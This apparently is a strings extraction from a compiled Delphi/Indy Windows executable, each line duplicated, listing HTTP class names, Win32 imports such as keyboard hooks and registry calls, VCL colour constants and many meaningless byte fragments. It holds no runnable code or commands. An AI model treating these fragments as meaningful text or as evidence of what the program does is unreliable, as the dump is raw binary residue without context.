TIdHTTPOption
TIdHTTPOption
TIdHTTPOptions
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPOnRedirectEvent
TIdHTTPOnHeadersAvailable
TIdHTTPOnHeadersAvailable
FHTTP
FHTTP
TIdHTTPResponse7
TIdHTTPResponse7
TIdHTTPResponse
TIdHTTPResponse
TIdHTTPRequest5
TIdHTTPRequest5
AHTTP
AHTTP
TIdHTTPRequestp%S
TIdHTTPRequestp%S
TIdHTTPProtocol;
TIdHTTPProtocol;
TIdHTTPProtocol
TIdHTTPProtocol
FHTTPProto
FHTTPProto
TIdCustomHTTP'
TIdCustomHTTP'
TIdCustomHTTPl*S
TIdCustomHTTPl*S
HTTPOptionst S
HTTPOptionst S
TIdHTTP
TIdHTTP
EIdHTTPProtocolExceptionn
EIdHTTPProtocolExceptionn
EIdHTTPProtocolException
EIdHTTPProtocolException
BaseHttpn
BaseHttpn
GetWebRequestByGet
GetWebRequestByGet
GetWebRequestByPost
GetWebRequestByPost
BaseHttpd
BaseHttpd
HttpHelper
HttpHelper
WebBrowser1
WebBrowser1
WebMainFrm
WebMainFrm
fKeyword
fKeyword
Keywordd
Keywordd
ShowCmd
ShowCmd
HotKey
HotKey
UrlMon
UrlMon
IdTCPServer
IdTCPServer
IdCustomTCPServer
IdCustomTCPServer
1.2.3
1.2.3
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
inflate 1.2.3 Copyright 1995-2005 Mark Adler
KGS!@#$%X
KGS!@#$%X
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
oleaut32.dll
oleaut32.dll
advapi32.dll
advapi32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
user32.dll
user32.dll
kernel32.dll
kernel32.dll
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExW
SetWindowsHookExW
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjectsEx
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
MapVirtualKeyW
MapVirtualKeyW
LoadKeyboardLayoutW
LoadKeyboardLayoutW
GetKeyboardState
GetKeyboardState
GetKeyboardLayoutNameW
GetKeyboardLayoutNameW
GetKeyboardLayoutList
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyboardLayout
GetKeyState
GetKeyState
GetKeyNameTextW
GetKeyNameTextW
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
msimg32.dll
msimg32.dll
gdi32.dll
gdi32.dll
SetViewportOrgEx
SetViewportOrgEx
version.dll
version.dll
GetCPInfo
GetCPInfo
CreateIoCompletionPort
CreateIoCompletionPort
RegUnLoadKeyW
RegUnLoadKeyW
RegSaveKeyW
RegSaveKeyW
RegRestoreKeyW
RegRestoreKeyW
RegReplaceKeyW
RegReplaceKeyW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegLoadKeyW
RegLoadKeyW
RegFlushKey
RegFlushKey
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegCreateKeyExW
RegCreateKeyExW
ole32.dll
ole32.dll
comctl32.dll
comctl32.dll
shell32.dll
shell32.dll
ShellExecuteW
ShellExecuteW
winspool.drv
winspool.drv
netapi32.dll
netapi32.dll
uxtheme.dll
uxtheme.dll
DWMAPI.DLL
DWMAPI.DLL
windowscodecs.dll
windowscodecs.dll
333333333333333333
333333333333333333
33333833
33333833
3333339
3333339
3333333333333338
3333333333333338
:*"*"$3338
:*"*"$3338
3333333
3333333
33333333
33333333
33333333333
33333333333
3333333333338
3333333333338
33338?383
33338?383
333333333333
333333333333
:*3:"$3338
:*3:"$3338
333333333333333
333333333333333
(Webapp
(Webapp
KWindows
KWindows
0IdHTTPHeaderInfo
0IdHTTPHeaderInfo
IdTCPServer
IdTCPServer
Font.Charset
Font.Charset
Font.Color
Font.Color
Font.Height
Font.Height
Font.Name
Font.Name
Font.Style
Font.Style
TWebBrowser
TWebBrowser
Lines.Strings
Lines.Strings
Picture.Data
Picture.Data
(7),01444
(7),01444
'9=82<.342>
'9=82<.342>
lstrcmpiALoadLibraryALocalFreeLocalAllocGetACPSleepVirtualFreeVirtualAllocGetSystemInfoGetTickCountQueryPerformanceCounterGetVersionGetCurrentThreadIdVirtualQueryWideCharToMultiByteMultiByteToWideCharlstrlenWlstrcpynWLoadLibraryExWIsValidLocaleGetSystemDefaultUILanguageGetStartupInfoAGetProcAddressGetModuleHandleWGetModuleFileNameWGetUserDefaultUILanguageGetLocaleInfoWGetLastErrorGetCommandLineWFreeLibraryFindFirstFileWFindCloseExitProcessExitThreadCreateThreadCompareStringWWriteFileUnhandledExceptionFilterRtlUnwindRaiseExceptionGetStdHandleDeleteCriticalSectionLeaveCriticalSectionEnterCriticalSectionInitializeCriticalSectionCloseHandleRegQueryValueExWRegOpenKeyExWRegCloseKeyLoadStringWMessageBoxACharNextWSysFreeStringSysReAllocStringLenSysAllocStringLenTlsSetValueTlsGetValueLocalAllocGetModuleHandleWCreateWindowExWWindowFromPointWaitMessageUpdateWindowUnregisterClassWUnhookWindowsHookExTranslateMessageTranslateMDISysAccelTrackPopupMenuSystemParametersInfoWShowWindowShowScrollBarShowOwnedPopupsSetWindowsHookExWSetWindowTextWSetWindowPosSetWindowPlacementSetWindowLongWSetTimerSetScrollRangeSetScrollPosSetScrollInfoSetRectSetPropWSetParentSetMenuItemInfoWSetMenuSetForegroundWindowSetFocusSetCursorPosSetCursorSetClassLongWSetCaptureSetActiveWindowSendMessageASendMessageWScrollWindowScreenToClientRemovePropWRemoveMenuReleaseDCReleaseCaptureRegisterWindowMessageWRegisterClipboardFormatWRegisterClassWRedrawWindowPtInRectPostQuitMessagePostMessageWPeekMessageAPeekMessageWOffsetRectMsgWaitForMultipleObjectsExMsgWaitForMultipleObjectsMessageBoxWMapWindowPointsMapVirtualKeyWLoadStringWLoadKeyboardLayoutWLoadIconWLoadCursorWLoadBitmapWKillTimerIsZoomedIsWindowVisibleIsWindowUnicodeIsWindowEnabledIsWindowIsIconicIsDialogMessageAIsDialogMessageWIsChildInvalidateRectIntersectRectInsertMenuItemWInsertMenuWInflateRectGetWindowThreadProcessIdGetWindowTextWGetWindowRectGetWindowPlacementGetWindowLongWGetWindowDCGetTopWindowGetSystemMetricsGetSystemMenuGetSysColorBrushGetSysColorGetSubMenuGetScrollRangeGetScrollPosGetScrollInfoGetPropWGetParentGetWindowGetMessageTimeGetMessagePosGetMessageExtraInfoGetMenuStringWGetMenuStateGetMenuItemInfoWGetMenuItemIDGetMenuItemCountGetMenuGetLastActivePopupGetKeyboardStateGetKeyboardLayoutNameWGetKeyboardLayoutListGetKeyboardLayoutGetKeyStateGetKeyNameTextWGetIconInfoGetForegroundWindowGetFocusGetDesktopWindowGetDCExGetDCGetCursorPosGetCursorGetClipboardDataGetClientRectGetClassLongWGetClassInfoWGetCaptureGetActiveWindowFrameRectFindWindowExWFindWindowWFillRectEnumWindowsEnumThreadWindowsEnumChildWindowsEndPaintEnableWindowEnableScrollBarEnableMenuItemDrawTextExWDrawTextWDrawMenuBarDrawIconExDrawIconDrawFrameControlDrawFocusRectDrawEdgeDispatchMessageADispatchMessageWDestroyWindowDestroyMenuDestroyIconDestroyCursorDeleteMenuDefWindowProcWDefMDIChildProcWDefFrameProcWCreatePopupMenuCreateMenuCreateIconCreateAcceleratorTableWCopyIconClientToScreenCheckMenuItemCharUpperBuffWCharNextWCharLowerBuffWCharLowerWCallWindowProcWCallNextHookExBeginPaintAdjustWindowRectExActivateKeyboardLayoutAlphaBlendUnrealizeObjectStretchDIBitsStretchBltStartPageStartDocWSetWindowOrgExSetWinMetaFileBitsSetViewportOrgExSetTextColorSetStretchBltModeSetROP2SetPixelSetMapModeSetEnhMetaFileBitsSetDIBitsSetDIBColorTableSetBrushOrgExSetBkModeSetBkColorSetAbortProcSelectPaletteSelectObjectSaveDCRoundRectRestoreDCResizePaletteRectangleRectVisibleRealizePalettePolylinePolygonPolyBezierToPolyBezierPlayEnhMetaFilePiePatBltMoveToExMaskBltLineToLPtoDPIntersectClipRectGetWindowOrgExGetWinMetaFileBitsGetTextMetricsWGetTextExtentPoint32WGetSystemPaletteEntriesGetStockObjectGetRgnBoxGetPixelGetPaletteEntriesGetObjectWGetNearestPaletteIndexGetEnhMetaFilePaletteEntriesGetEnhMetaFileHeaderGetEnhMetaFileDescriptionWGetEnhMetaFileBitsGetDeviceCapsGetDIBitsGetDIBColorTableGetDCOrgExGetCurrentPositionExGetClipBoxGetBrushOrgExGetBitmapBitsGdiFlushFrameRgnExtTextOutWExtFloodFillExcludeClipRectEnumFontsWEnumFontFamiliesExWEndPageEndDocEllipseDeleteObjectDeleteEnhMetaFileDeleteDCCreateSolidBrushCreateRectRgnCreatePenIndirectCreatePaletteCreateICWCreateHalftonePaletteCreateFontIndirectWCreateEnhMetaFileWCreateDIBitmapCreateDIBSectionCreateDCWCreateCompatibleDCCreateCompatibleBitmapCreateBrushIndirectCreateBitmapCopyEnhMetaFileWCloseEnhMetaFileChordBitBltArcAbortDocVerQueryValueWGetFileVersionInfoSizeWGetFileVersionInfoWlstrcpyWWritePrivateProfileStringWWriteFileWideCharToMultiByteWaitForSingleObjectWaitForMultipleObjectsExVirtualQueryExVirtualQueryVirtualFreeVirtualAllocTryEnterCriticalSectionSwitchToThreadSuspendThreadSleepSizeofResourceSignalObjectAndWaitSetThreadPrioritySetThreadLocaleSetLastErrorSetFilePointerSetFileAttributesWSetEventSetErrorModeSetEndOfFileResumeThreadResetEventReadFileReadDirectoryChangesWRaiseExceptionQueryPerformanceFrequencyQueryPerformanceCounterPostQueuedCompletionStatusIsDebuggerPresentMultiByteToWideCharMulDivMoveFileWLockResourceLoadResourceLoadLibraryWLeaveCriticalSectionInitializeCriticalSectionGlobalUnlockGlobalSizeGlobalLockGlobalFreeGlobalFindAtomWGlobalDeleteAtomGlobalAllocGlobalAddAtomWGetVersionExWGetVersionGetUserDefaultLCIDGetTimeZoneInformationGetTickCountGetThreadPriorityGetThreadLocaleGetTempPathWGetStdHandleGetQueuedCompletionStatusGetProcAddressGetPrivateProfileStringWGetModuleHandleWGetModuleFileNameWGetLocaleInfoWGetLocalTimeGetLastErrorGetFullPathNameWGetFileSizeGetFileAttributesWGetExitCodeThreadGetExitCodeProcessGetDiskFreeSpaceWGetDateFormatWGetCurrentThreadIdGetCurrentThreadGetCurrentProcessIdGetCurrentProcessGetComputerNameWGetCPInfoFreeResourceInterlockedExchangeAddInterlockedExchangeInterlockedCompareExchangeFreeLibraryFormatMessageWFindResourceWFindNextFileWFindFirstFileWFindCloseFileTimeToLocalFileTimeFileTimeToDosDateTimeExitProcessEnumCalendarInfoWEnterCriticalSectionDeleteFileWDeleteCriticalSectionCreateThreadCreateProcessWCreateIoCompletionPortCreateFileWCreateEventWCopyFileWCompareStringWCloseHandleRegUnLoadKeyWRegSetValueExWRegSaveKeyWRegRestoreKeyWRegReplaceKeyWRegQueryValueExWRegQueryInfoKeyWRegOpenKeyExWRegLoadKeyWRegFlushKeyRegEnumValueWRegEnumKeyExWRegDeleteValueWRegDeleteKeyWRegCreateKeyExWRegConnectRegistryWRegCloseKeyGetErrorInfoGetActiveObjectSysFreeStringCreateStreamOnHGlobalOleRegEnumVerbsIsAcceleratorOleDrawOleSetMenuDescriptorOleUninitializeOleInitializeCoTaskMemFreeProgIDFromCLSIDStringFromCLSIDCoCreateInstanceCoGetClassObjectCoUninitializeCoInitializeIsEqualGUIDInitializeFlatSBFlatSB_SetScrollPropFlatSB_SetScrollPosFlatSB_SetScrollInfoFlatSB_GetScrollPosFlatSB_GetScrollInfo_TrackMouseEventImageList_GetImageInfoImageList_SetIconSizeImageList_GetIconSizeImageList_WriteImageList_ReadImageList_GetDragImageImageList_DragShowNolockImageList_DragMoveImageList_DragLeaveImageList_DragEnterImageList_EndDragImageList_BeginDragImageList_CopyImageList_LoadImageWImageList_GetIconImageList_RemoveImageList_DrawExImageList_ReplaceImageList_DrawImageList_SetOverlayImageImageList_GetBkColorImageList_SetBkColorImageList_ReplaceIconImageList_AddImageList_SetImageCountImageList_GetImageCountImageList_DestroyImageList_CreateSleepIsEqualGUIDSafeArrayPtrOfIndexSafeArrayGetUBoundSafeArrayGetLBoundSafeArrayCreateVariantChangeTypeVariantCopyVariantClearVariantInitShellExecuteWSHGetSpecialFolderLocationSHGetPathFromIDListWOpenPrinterWEnumPrintersWDocumentPropertiesWClosePrinterGetDefaultPrinterWNetbios
lstrcmpiALoadLibraryALocalFreeLocalAllocGetACPSleepVirtualFreeVirtualAllocGetSystemInfoGetTickCountQueryPerformanceCounterGetVersionGetCurrentThreadIdVirtualQueryWideCharToMultiByteMultiByteToWideCharlstrlenWlstrcpynWLoadLibraryExWIsValidLocaleGetSystemDefaultUILanguageGetStartupInfoAGetProcAddressGetModuleHandleWGetModuleFileNameWGetUserDefaultUILanguageGetLocaleInfoWGetLastErrorGetCommandLineWFreeLibraryFindFirstFileWFindCloseExitProcessExitThreadCreateThreadCompareStringWWriteFileUnhandledExceptionFilterRtlUnwindRaiseExceptionGetStdHandleDeleteCriticalSectionLeaveCriticalSectionEnterCriticalSectionInitializeCriticalSectionCloseHandleRegQueryValueExWRegOpenKeyExWRegCloseKeyLoadStringWMessageBoxACharNextWSysFreeStringSysReAllocStringLenSysAllocStringLenTlsSetValueTlsGetValueLocalAllocGetModuleHandleWCreateWindowExWWindowFromPointWaitMessageUpdateWindowUnregisterClassWUnhookWindowsHookExTranslateMessageTranslateMDISysAccelTrackPopupMenuSystemParametersInfoWShowWindowShowScrollBarShowOwnedPopupsSetWindowsHookExWSetWindowTextWSetWindowPosSetWindowPlacementSetWindowLongWSetTimerSetScrollRangeSetScrollPosSetScrollInfoSetRectSetPropWSetParentSetMenuItemInfoWSetMenuSetForegroundWindowSetFocusSetCursorPosSetCursorSetClassLongWSetCaptureSetActiveWindowSendMessageASendMessageWScrollWindowScreenToClientRemovePropWRemoveMenuReleaseDCReleaseCaptureRegisterWindowMessageWRegisterClipboardFormatWRegisterClassWRedrawWindowPtInRectPostQuitMessagePostMessageWPeekMessageAPeekMessageWOffsetRectMsgWaitForMultipleObjectsExMsgWaitForMultipleObjectsMessageBoxWMapWindowPointsMapVirtualKeyWLoadStringWLoadKeyboardLayoutWLoadIconWLoadCursorWLoadBitmapWKillTimerIsZoomedIsWindowVisibleIsWindowUnicodeIsWindowEnabledIsWindowIsIconicIsDialogMessageAIsDialogMessageWIsChildInvalidateRectIntersectRectInsertMenuItemWInsertMenuWInflateRectGetWindowThreadProcessIdGetWindowTextWGetWindowRectGetWindowPlacementGetWindowLongWGetWindowDCGetTopWindowGetSystemMetricsGetSystemMenuGetSysColorBrushGetSysColorGetSubMenuGetScrollRangeGetScrollPosGetScrollInfoGetPropWGetParentGetWindowGetMessageTimeGetMessagePosGetMessageExtraInfoGetMenuStringWGetMenuStateGetMenuItemInfoWGetMenuItemIDGetMenuItemCountGetMenuGetLastActivePopupGetKeyboardStateGetKeyboardLayoutNameWGetKeyboardLayoutListGetKeyboardLayoutGetKeyStateGetKeyNameTextWGetIconInfoGetForegroundWindowGetFocusGetDesktopWindowGetDCExGetDCGetCursorPosGetCursorGetClipboardDataGetClientRectGetClassLongWGetClassInfoWGetCaptureGetActiveWindowFrameRectFindWindowExWFindWindowWFillRectEnumWindowsEnumThreadWindowsEnumChildWindowsEndPaintEnableWindowEnableScrollBarEnableMenuItemDrawTextExWDrawTextWDrawMenuBarDrawIconExDrawIconDrawFrameControlDrawFocusRectDrawEdgeDispatchMessageADispatchMessageWDestroyWindowDestroyMenuDestroyIconDestroyCursorDeleteMenuDefWindowProcWDefMDIChildProcWDefFrameProcWCreatePopupMenuCreateMenuCreateIconCreateAcceleratorTableWCopyIconClientToScreenCheckMenuItemCharUpperBuffWCharNextWCharLowerBuffWCharLowerWCallWindowProcWCallNextHookExBeginPaintAdjustWindowRectExActivateKeyboardLayoutAlphaBlendUnrealizeObjectStretchDIBitsStretchBltStartPageStartDocWSetWindowOrgExSetWinMetaFileBitsSetViewportOrgExSetTextColorSetStretchBltModeSetROP2SetPixelSetMapModeSetEnhMetaFileBitsSetDIBitsSetDIBColorTableSetBrushOrgExSetBkModeSetBkColorSetAbortProcSelectPaletteSelectObjectSaveDCRoundRectRestoreDCResizePaletteRectangleRectVisibleRealizePalettePolylinePolygonPolyBezierToPolyBezierPlayEnhMetaFilePiePatBltMoveToExMaskBltLineToLPtoDPIntersectClipRectGetWindowOrgExGetWinMetaFileBitsGetTextMetricsWGetTextExtentPoint32WGetSystemPaletteEntriesGetStockObjectGetRgnBoxGetPixelGetPaletteEntriesGetObjectWGetNearestPaletteIndexGetEnhMetaFilePaletteEntriesGetEnhMetaFileHeaderGetEnhMetaFileDescriptionWGetEnhMetaFileBitsGetDeviceCapsGetDIBitsGetDIBColorTableGetDCOrgExGetCurrentPositionExGetClipBoxGetBrushOrgExGetBitmapBitsGdiFlushFrameRgnExtTextOutWExtFloodFillExcludeClipRectEnumFontsWEnumFontFamiliesExWEndPageEndDocEllipseDeleteObjectDeleteEnhMetaFileDeleteDCCreateSolidBrushCreateRectRgnCreatePenIndirectCreatePaletteCreateICWCreateHalftonePaletteCreateFontIndirectWCreateEnhMetaFileWCreateDIBitmapCreateDIBSectionCreateDCWCreateCompatibleDCCreateCompatibleBitmapCreateBrushIndirectCreateBitmapCopyEnhMetaFileWCloseEnhMetaFileChordBitBltArcAbortDocVerQueryValueWGetFileVersionInfoSizeWGetFileVersionInfoWlstrcpyWWritePrivateProfileStringWWriteFileWideCharToMultiByteWaitForSingleObjectWaitForMultipleObjectsExVirtualQueryExVirtualQueryVirtualFreeVirtualAllocTryEnterCriticalSectionSwitchToThreadSuspendThreadSleepSizeofResourceSignalObjectAndWaitSetThreadPrioritySetThreadLocaleSetLastErrorSetFilePointerSetFileAttributesWSetEventSetErrorModeSetEndOfFileResumeThreadResetEventReadFileReadDirectoryChangesWRaiseExceptionQueryPerformanceFrequencyQueryPerformanceCounterPostQueuedCompletionStatusIsDebuggerPresentMultiByteToWideCharMulDivMoveFileWLockResourceLoadResourceLoadLibraryWLeaveCriticalSectionInitializeCriticalSectionGlobalUnlockGlobalSizeGlobalLockGlobalFreeGlobalFindAtomWGlobalDeleteAtomGlobalAllocGlobalAddAtomWGetVersionExWGetVersionGetUserDefaultLCIDGetTimeZoneInformationGetTickCountGetThreadPriorityGetThreadLocaleGetTempPathWGetStdHandleGetQueuedCompletionStatusGetProcAddressGetPrivateProfileStringWGetModuleHandleWGetModuleFileNameWGetLocaleInfoWGetLocalTimeGetLastErrorGetFullPathNameWGetFileSizeGetFileAttributesWGetExitCodeThreadGetExitCodeProcessGetDiskFreeSpaceWGetDateFormatWGetCurrentThreadIdGetCurrentThreadGetCurrentProcessIdGetCurrentProcessGetComputerNameWGetCPInfoFreeResourceInterlockedExchangeAddInterlockedExchangeInterlockedCompareExchangeFreeLibraryFormatMessageWFindResourceWFindNextFileWFindFirstFileWFindCloseFileTimeToLocalFileTimeFileTimeToDosDateTimeExitProcessEnumCalendarInfoWEnterCriticalSectionDeleteFileWDeleteCriticalSectionCreateThreadCreateProcessWCreateIoCompletionPortCreateFileWCreateEventWCopyFileWCompareStringWCloseHandleRegUnLoadKeyWRegSetValueExWRegSaveKeyWRegRestoreKeyWRegReplaceKeyWRegQueryValueExWRegQueryInfoKeyWRegOpenKeyExWRegLoadKeyWRegFlushKeyRegEnumValueWRegEnumKeyExWRegDeleteValueWRegDeleteKeyWRegCreateKeyExWRegConnectRegistryWRegCloseKeyGetErrorInfoGetActiveObjectSysFreeStringCreateStreamOnHGlobalOleRegEnumVerbsIsAcceleratorOleDrawOleSetMenuDescriptorOleUninitializeOleInitializeCoTaskMemFreeProgIDFromCLSIDStringFromCLSIDCoCreateInstanceCoGetClassObjectCoUninitializeCoInitializeIsEqualGUIDInitializeFlatSBFlatSB_SetScrollPropFlatSB_SetScrollPosFlatSB_SetScrollInfoFlatSB_GetScrollPosFlatSB_GetScrollInfo_TrackMouseEventImageList_GetImageInfoImageList_SetIconSizeImageList_GetIconSizeImageList_WriteImageList_ReadImageList_GetDragImageImageList_DragShowNolockImageList_DragMoveImageList_DragLeaveImageList_DragEnterImageList_EndDragImageList_BeginDragImageList_CopyImageList_LoadImageWImageList_GetIconImageList_RemoveImageList_DrawExImageList_ReplaceImageList_DrawImageList_SetOverlayImageImageList_GetBkColorImageList_SetBkColorImageList_ReplaceIconImageList_AddImageList_SetImageCountImageList_GetImageCountImageList_DestroyImageList_CreateSleepIsEqualGUIDSafeArrayPtrOfIndexSafeArrayGetUBoundSafeArrayGetLBoundSafeArrayCreateVariantChangeTypeVariantCopyVariantClearVariantInitShellExecuteWSHGetSpecialFolderLocationSHGetPathFromIDListWOpenPrinterWEnumPrintersWDocumentPropertiesWClosePrinterGetDefaultPrinterWNetbios
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
KERNEL32.DLL
KERNEL32.DLL
D.hlL
D.hlL
tV!.UJ
tV!.UJ
.fEDu
.fEDu
XR&%XR(
XR&%XR(
Q.LeS
Q.LeS
eQ.XT
eQ.XT
?|%c?
?|%c?
].zd)
].zd)
(4.K%S
(4.K%S
z].Zk
z].Zk
s.iT7
s.iT7
f.EQ/
f.EQ/
gpU?.cJ
gpU?.cJ
iA/4.Cc
iA/4.Cc
=%x
=%x
O.Edy
O.Edy
.eO=
.eO=
%TCp1
%TCp1
#?tSQL
#?tSQL
XofeÒ
XofeÒ
FJ1.Hb
FJ1.Hb
.zpJPr
.zpJPr
)k %s
)k %s
%ud3q:I
%ud3q:I
,%X9&
,%X9&
.SG5I
.SG5I
AWeB
AWeB
#UG%D;5g
#UG%D;5g
tj-Bf}
tj-Bf}
(-M}
(-M}
e5y%f
e5y%f
W%I%sV
W%I%sV
%S-3f
%S-3f
}rh%D'
}rh%D'
þ0c
þ0c
ONxW%U
ONxW%U
yV2.nE
yV2.nE
lK.rF
lK.rF
$5x%X
$5x%X
Z.aRU-Y
Z.aRU-Y
n%uU;]
n%uU;]
w.VB'6
w.VB'6
R%s^`-=
R%s^`-=
"R.jXNL
"R.jXNL
.Hxs}
.Hxs}
.CuJ@:?
.CuJ@:?
;#,
;#,
MSWHEEL_ROLLMSG
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
MSH_SCROLL_LINES_MSG
%s[%d]
%s[%d]
%s_%d
%s_%d
.Owner
.Owner
USER32.DLL
USER32.DLL
\\?\UNC\
\\?\UNC\
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATA
%s (*.%s)|*.%1:s
%s (*.%s)|*.%1:s
%s (%s)|%1:s|
%s (%s)|%1:s|
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
clWebSnow
clWebSnow
clWebFloralWhite
clWebFloralWhite
clWebLavenderBlush
clWebLavenderBlush
clWebOldLace
clWebOldLace
clWebIvory
clWebIvory
clWebCornSilk
clWebCornSilk
clWebBeige
clWebBeige
clWebAntiqueWhite
clWebAntiqueWhite
clWebWheat
clWebWheat
clWebAliceBlue
clWebAliceBlue
clWebGhostWhite
clWebGhostWhite
clWebLavender
clWebLavender
clWebSeashell
clWebSeashell
clWebLightYellow
clWebLightYellow
clWebPapayaWhip
clWebPapayaWhip
clWebNavajoWhite
clWebNavajoWhite
clWebMoccasin
clWebMoccasin
clWebBurlywood
clWebBurlywood
clWebAzure
clWebAzure
clWebMintcream
clWebMintcream
clWebHoneydew
clWebHoneydew
clWebLinen
clWebLinen
clWebLemonChiffon
clWebLemonChiffon
clWebBlanchedAlmond
clWebBlanchedAlmond
clWebBisque
clWebBisque
clWebPeachPuff
clWebPeachPuff
clWebTan
clWebTan
clWebYellow
clWebYellow
clWebDarkOrange
clWebDarkOrange
clWebRed
clWebRed
clWebDarkRed
clWebDarkRed
clWebMaroon
clWebMaroon
clWebIndianRed
clWebIndianRed
clWebSalmon
clWebSalmon
clWebCoral
clWebCoral
clWebGold
clWebGold
clWebTomato
clWebTomato
clWebCrimson
clWebCrimson
clWebBrown
clWebBrown
clWebChocolate
clWebChocolate
clWebSandyBrown
clWebSandyBrown
clWebLightSalmon
clWebLightSalmon
clWebLightCoral
clWebLightCoral
clWebOrange
clWebOrange
clWebOrangeRed
clWebOrangeRed
clWebFirebrick
clWebFirebrick
clWebSaddleBrown
clWebSaddleBrown
clWebSienna
clWebSienna
clWebPeru
clWebPeru
clWebDarkSalmon
clWebDarkSalmon
clWebRosyBrown
clWebRosyBrown
clWebPaleGoldenrod
clWebPaleGoldenrod
clWebLightGoldenrodYellow
clWebLightGoldenrodYellow
clWebOlive
clWebOlive
clWebForestGreen
clWebForestGreen
clWebGreenYellow
clWebGreenYellow
clWebChartreuse
clWebChartreuse
clWebLightGreen
clWebLightGreen
clWebAquamarine
clWebAquamarine
clWebSeaGreen
clWebSeaGreen
clWebGoldenRod
clWebGoldenRod
clWebKhaki
clWebKhaki
clWebOliveDrab
clWebOliveDrab
clWebGreen
clWebGreen
clWebYellowGreen
clWebYellowGreen
clWebLawnGreen
clWebLawnGreen
clWebPaleGreen
clWebPaleGreen
clWebMediumAquamarine
clWebMediumAquamarine
clWebMediumSeaGreen
clWebMediumSeaGreen
clWebDarkGoldenRod
clWebDarkGoldenRod
clWebDarkKhaki
clWebDarkKhaki
clWebDarkOliveGreen
clWebDarkOliveGreen
clWebDarkgreen
clWebDarkgreen
clWebLimeGreen
clWebLimeGreen
clWebLime
clWebLime
clWebSpringGreen
clWebSpringGreen
clWebMediumSpringGreen
clWebMediumSpringGreen
clWebDarkSeaGreen
clWebDarkSeaGreen
clWebLightSeaGreen
clWebLightSeaGreen
clWebPaleTurquoise
clWebPaleTurquoise
clWebLightCyan
clWebLightCyan
clWebLightBlue
clWebLightBlue
clWebLightSkyBlue
clWebLightSkyBlue
clWebCornFlowerBlue
clWebCornFlowerBlue
clWebDarkBlue
clWebDarkBlue
clWebIndigo
clWebIndigo
clWebMediumTurquoise
clWebMediumTurquoise
clWebTurquoise
clWebTurquoise
clWebCyan
clWebCyan
clWebPowderBlue
clWebPowderBlue
clWebSkyBlue
clWebSkyBlue
clWebRoyalBlue
clWebRoyalBlue
clWebMediumBlue
clWebMediumBlue
clWebMidnightBlue
clWebMidnightBlue
clWebDarkTurquoise
clWebDarkTurquoise
clWebCadetBlue
clWebCadetBlue
clWebDarkCyan
clWebDarkCyan
clWebTeal
clWebTeal
clWebDeepskyBlue
clWebDeepskyBlue
clWebDodgerBlue
clWebDodgerBlue
clWebBlue
clWebBlue
clWebNavy
clWebNavy
clWebDarkViolet
clWebDarkViolet
clWebDarkOrchid
clWebDarkOrchid
clWebMagenta
clWebMagenta
clWebDarkMagenta
clWebDarkMagenta
clWebMediumVioletRed
clWebMediumVioletRed
clWebPaleVioletRed
clWebPaleVioletRed
clWebBlueViolet
clWebBlueViolet
clWebMediumOrchid
clWebMediumOrchid
clWebMediumPurple
clWebMediumPurple
clWebPurple
clWebPurple
clWebDeepPink
clWebDeepPink
clWebLightPink
clWebLightPink
clWebViolet
clWebViolet
clWebOrchid
clWebOrchid
clWebPlum
clWebPlum
clWebThistle
clWebThistle
clWebHotPink
clWebHotPink
clWebPink
clWebPink
clWebLightSteelBlue
clWebLightSteelBlue
clWebMediumSlateBlue
clWebMediumSlateBlue
clWebLightSlateGray
clWebLightSlateGray
clWebWhite
clWebWhite
clWebLightgrey
clWebLightgrey
clWebGray
clWebGray
clWebSteelBlue
clWebSteelBlue
clWebSlateBlue
clWebSlateBlue
clWebSlateGray
clWebSlateGray
clWebWhiteSmoke
clWebWhiteSmoke
clWebSilver
clWebSilver
clWebDimGray
clWebDimGray
clWebMistyRose
clWebMistyRose
clWebDarkSlateBlue
clWebDarkSlateBlue
clWebDarkSlategray
clWebDarkSlategray
clWebGainsboro
clWebGainsboro
clWebDarkGray
clWebDarkGray
clWebBlack
clWebBlack
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
crSQLWait
crSQLWait
%s (%s)
%s (%s)
imm32.dll
imm32.dll
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
%s, ClassID: %s
%s, ClassID: %s
olepro32.dll
olepro32.dll
%d - %s
%d - %s
C:\Builds\TP\indysockets\lib\System\IdStreamVCL.pas
C:\Builds\TP\indysockets\lib\System\IdStreamVCL.pas
C:\Builds\TP\indysockets\lib\System\IdGlobal.pas
C:\Builds\TP\indysockets\lib\System\IdGlobal.pas
%s, %.2d %s %.4d %s %s
%s, %.2d %s %.4d %s %s
%s, %.2d-%s-%.2d %s %s
%s, %.2d-%s-%.2d %s %s
10.5.5
10.5.5
WS2_32.DLL
WS2_32.DLL
